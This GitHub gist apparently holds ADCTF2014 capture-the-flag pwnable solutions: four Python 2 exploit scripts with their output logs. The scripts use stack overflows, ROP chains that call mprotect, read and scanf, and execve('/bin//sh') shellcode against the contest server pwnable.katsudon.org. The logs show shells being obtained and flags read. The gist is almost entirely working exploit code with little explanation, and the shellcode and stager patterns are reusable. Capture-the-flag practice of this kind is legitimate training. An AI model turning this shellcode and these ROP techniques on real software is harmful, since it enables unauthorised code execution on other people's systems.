Create a gist now

Instantly share code, notes, and snippets.

@hhc0null /day17.py
Last active Aug 29, 2015

What would you like to do?
ADCTF2014 Writeups(pwnable only)
#!/usr/bin/env python2
from pwning import *
import sys
if len(sys.argv) != 2:
print "Usage: {} [align]".format(sys.argv[0])
rhp = ("pwnable.katsudon.org", 32100)
#rhp = ("localhost", 32100)
# execve("/bin//sh", {"/bin//sh", NULL}, NULL);
sc = "\x0b\x31\xc0\xb0\x0f\x34\x04\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
#sc = "\x6a\x0b\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0bxcd\x80"#\x00\x31\xc0\x40\xcd\x80"
align_size = int(sys.argv[1], 16)
scanf = 0x80483b0
dynamic = 0x8049f14
gotplt = 0x804a001
ppr = 0x804858e
ret = 0x8048346
badaddr = 0xbadadd12
sc_addr = gotplt
payload = ""
payload += "A"*0x18
payload += "A"*align_size
payload += "EBP!"
# scanf("%s", sc_addr);
payload += p(scanf)
payload += p(ppr)
payload += p(0x80485c7) # "%s"
payload += p(sc_addr)
# exec shellcode
payload += p(ret)
payload += p(sc_addr)
#payload += p(badaddr)
payload += '\0'
assert not '\0' in sc
assert not '\n' in sc
print "payload size: "+str(len(payload))
print "payload: "+repr(payload)
cli = RemoteConnector(rhp)
print cli.read()
cli.write(payload+sc)
print repr(cli.read())
cli.intaractive()
"""
payload size: 53
payload: 'AAAAAAAAAAAAAAAAAAAAAAAAEBP!\xb0\x83\x04\x08\x8e\x85\x04\x08\xc7\x85\x04\x08\x01\xa0\x04\x08F\x83\x04\x08\x01\xa0\x04\x08\x00'
name:
'hi, AAAAAAAAAAAAAAAAAAAAAAAAEBP!\xb0\x83\x04\x08\x8e\x85\x04\x08\xc7\x85\x04\x08\x01\xa0\x04\x08F\x83\x04\x08\x01\xa0\x04\x08\n'
ls
$ ls
flag
$ cat flag
ADCTF_Sc4NF_IS_PRe77Y_niCE
"""
#!/usr/bin/env python2
from pwning import *
import sys
import time
rhp = ("pwnable.katsudon.org", 28099)
#rhp = ("localhost", 28099)
badaddr = 0xbadadd12
syscall = 0x08048080
ret = 0x0804808e # ret ;
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
data1 = "A"*4
data2 = "A"*3
page_base = 0xa0000000
print "[*] page base address: "+hex(page_base)
stager = ""
stager += "A"*0x10 # fill up buffer
# read(STDIN_FILENO, buf, 0x80);
stager += p(0x80480a7) # read data until 128 bytes
stager += "JUNK"*4
stager += p(0x080480ea) # add al, 0x5E ; ret ;
stager += p(0x080480ea) # add al, 0x5E ; ret ;
stager += p(0x080480eb) # pop esi ; ret ;
stager += p(0x22)
# mmap2(page_base, 31, PROT_READ|PROT_WRITE|PROT_EXEC);
stager += p(syscall)
stager += p(0x080480bb) # add esp, 0x10 ; ret ;
stager += p(page_base)
stager += p(0x1000)
stager += p(0x7)
stager += "JUNK"
stager += p(0x080480eb) # pop esi ; ret ;
stager += p(syscall)
# read(STDIN_FILENO, buf, 0x80);
stager += p(0x80480a7) # read data until 128 bytes
stager += "JUNK"*4
# read(STDIN_FILENO, page_base, 31);
stager += p(syscall)
stager += p(page_base)
stager += p(STDIN_FILENO)
stager += p(page_base)
stager += p(len(sc))
stager += "JUNK"
stager += "!"*(0x80-len(stager))
#assert len(stager) == 0x80
print len(stager)
print "payload: "+repr(stager+data1+data2+sc)
remote = RemoteConnector(rhp)
print remote.read()
remote.write(stager)
try:
remote.read()
except:
pass
remote.write(data1)
try:
remote.read()
except:
pass
remote.write(data2)
try:
remote.read()
except:
pass
remote.write(sc)
remote.intaractive()
"""
[*] page base address: 0xa0000000L
128
payload: 'AAAAAAAAAAAAAAAA\xa7\x80\x04\x08JUNKJUNKJUNKJUNK\xea\x80\x04\x08\xea\x80\x04\x08\xeb\x80\x04\x08"\x00\x00\x00\x80\x80\x04\x08\xbb\x80\x04\x08\x00\x00\x00\xa0\x00\x10\x00\x00\x07\x00\x00\x00JUNK\xeb\x80\x04\x08\x80\x80\x04\x08\xa7\x80\x04\x08JUNKJUNKJUNKJUNK\x80\x80\x04\x08\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\xa0\x1c\x00\x00\x00JUNKAAAAAAA1\xc0Ph//shh/bin\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x801\xc0@\xcd\x80'
pwn me:
$ id
uid=1000(easypwn) gid=1000(easypwn) groups=1000(easypwn)
$ ls
flag
$ cat flag
ADCTF_175_345y_7o_cON7ROL_5Y5c4LL
"""
#!/usr/bin/env python2
from pwning import *
import binascii
import sys
if len(sys.argv) != 2:
print "Usage: {} [align size]".format(sys.argv[0])
sys.exit(0)
rhp = ("pwnable.katsudon.org", 33201)
#rhp = ("localhost", 33201)
align_size = int(sys.argv[1], 16)
ret = 0x80484fd
pppr = 0x0804855d # pop esi ; pop edi ; pop ebp ; ret ;
read_plt = 0x08048340
mprotect_plt = 0x08048330
baddaddr = 0xbadadd12 # for debug
sc = ""
# execve("/bin//sh", {"/bin//sh", NULL}, NULL);
sc += "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
#sc += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" # /bin/sh
stager = ""
stager += p(ret)
stager += "A"*align_size
stager += "EBP!"
# mprotect(0x20000000, 0x400, PROT_READ|PROT_WRITE|PROT_EXEC);
stager += p(mprotect_plt)
stager += p(pppr)
stager += p(0x20000000)
stager += p(0x400)
stager += p(PROT_READ|PROT_WRITE|PROT_EXEC)
# read(STDIN_FILENO, 0x20000000, sizeof(sc));
stager += p(read_plt)
stager += p(pppr)
stager += p(STDIN_FILENO)
stager += p(0x20000000)
stager += p(len(sc))
# exec shellcode
stager += p(ret)
stager += p(0x20000000)
stager += "A"*(0x400-len(stager))
remote = RemoteConnector(rhp)
remote.write(stager)
remote.write(sc)
remote.intaractive()
#!/usr/bin/env python2
from pwning import *
import binascii
import sys
import base64
if len(sys.argv) != 2:
print "Usage: {} [cmd]".format(sys.argv[0])
sys.exit(0)
cmd = sys.argv[1]
retq = 0x400516
pppr = 0x0040068e # pop r13 ; pop r14 ; pop r15 ; ret ;
read_plt = 0x0000000000400490
read_got = 0x601020
mprotect_plt = 0x00000000004004c0
mprotect_got = 0x601038
baddaddr = 0xbadadd12 # for debug
sc = ""
sc += "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x8d\x42\x3b\x0f\x05"
def set_args(edi=0, rsi=0, rdx=0, addr=retq, rbx=0, rbp=0):
sq = ""
sq += p(0x0040068a, t="<Q") # pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret ;
sq += p(rbx, t="<Q")
sq += p(rbp, t="<Q")
sq += p(addr, t="<Q")
sq += p(rdx, t="<Q")
sq += p(rsi, t="<Q")
sq += p(edi, t="<Q")
sq += p(0x400670, t="<Q") # mov rdx, r13 ; mov rsi, r14 ; mov edi, r15d ; callq (r12, rbx, 8)
return sq
stager = ""
stager += p(retq, "<Q")
stager += "EBP!EBP!"
# mprotect(0x20000000, 0x400, PROT_READ|PROT_WRITE|PROT_EXEC);
stager += set_args(0x20000000, 0x400, PROT_READ|PROT_WRITE|PROT_EXEC, mprotect_got-8*1, rbx=1, rbp=2)
stager += "JUNKJUNK"*7
# read(STDIN_FILENO, 0x20000000, sizeof(sc));
stager += set_args(STDIN_FILENO, 0x20000000, len(sc), read_got, rbx=0, rbp=1)
stager += "JUNKJUNK"*7
# exec shellcode
stager += p(0x20000000, t="<Q")
stager += "A"*(0x400-len(stager))
data = base64.b64encode(stager+sc+"\n{}\n".format(cmd))
sys.stdout.write(data)
"""
$ ls
flag
shellcodeme2
$ cat flag
$ echo FgVAAAAAAABFQlAhRUJQIYoGQAAAAAAAAQAAAAAAAAACAAAAAAAAADAQYAAAAAAABwAAAAAAAAAABAAAAAAAAAAAACAAAAAAcAZAAAAAAABKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS4oGQAAAAAAAAAAAAAAAAAABAAAAAAAAACAQYAAAAAAAHQAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAcAZAAAAAAABKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOS0pVTktKVU5LSlVOSwAAACAAAAAAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUgx0lJIuC9iaW4vL3NoUEiJ51JXSInmSI1COw8FCmNhdCBmbGFnCg==|base64 -d|./shellcodeme2
ADCTF_I_l0v3_tH15_4W350M3_m15T4K3
$ echo I got flag!
I got flag!
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment